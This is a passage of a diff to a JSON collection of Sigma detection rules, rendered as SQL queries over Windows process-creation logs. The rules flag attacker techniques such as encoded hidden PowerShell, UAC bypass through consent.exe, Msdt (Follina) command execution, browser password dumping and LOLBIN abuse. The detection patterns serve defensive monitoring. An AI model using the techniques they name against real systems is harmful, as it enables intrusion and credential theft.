initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of office automation via scripting" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" + "filename": "proc_creation_win_office_svchost_parent.yml" }, { - "title": "Arbitrary Command Execution Using WSL", - "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "status": "test", - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Automation and orchestration scripts may use this method to execute scripts etc.", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Suspicious Execution of Powershell with Base64", - "id": "fb843269-508c-4b76-8b8d-88679db22ce7", - "status": "experimental", - "description": "Commandline to launch powershell with a base64 payload", - "author": "frack113", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ "attack.execution", "attack.t1059.001" @@ -22905,1714 +22911,1748 @@ "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + }, + { + "title": "PUA - WebBrowserPassView Execution", + "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "status": "experimental", + "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ], + "falsepositives": [ + "Legitimate use" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Web Browser Password Viewer' OR NewProcessName LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_encode.yml" + "filename": "proc_creation_win_pua_webbrowserpassview.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", - "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "status": "experimental", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", + "title": "Application Whitelisting Bypass via Bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "author": "Beyu Denis, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_lolbin_bginfo.yml" }, { - "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", - "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "status": "experimental", - "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", - "author": "frack113", + "title": "New Firewall Rule Added Via Netsh.EXE", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "status": "test", + "description": "Detects the addition of a new rule to the Windows firewall via netsh", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Legitimate administration activity", + "Software installations and removal" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mstsc_remote_connection.yml" + "filename": "proc_creation_win_netsh_fw_add_rule.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "LOLBIN From Abnormal Drive", - "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "status": "test", - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "author": "frack113", "tags": [ - "attack.t1218.001" + "attack.defense_evasion", + "attack.t1218", + "attack.t1216" ], "falsepositives": [ - "Rare false positives could occur on servers with multiple drives." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\') AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\' OR CurrentDirectory = '') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE 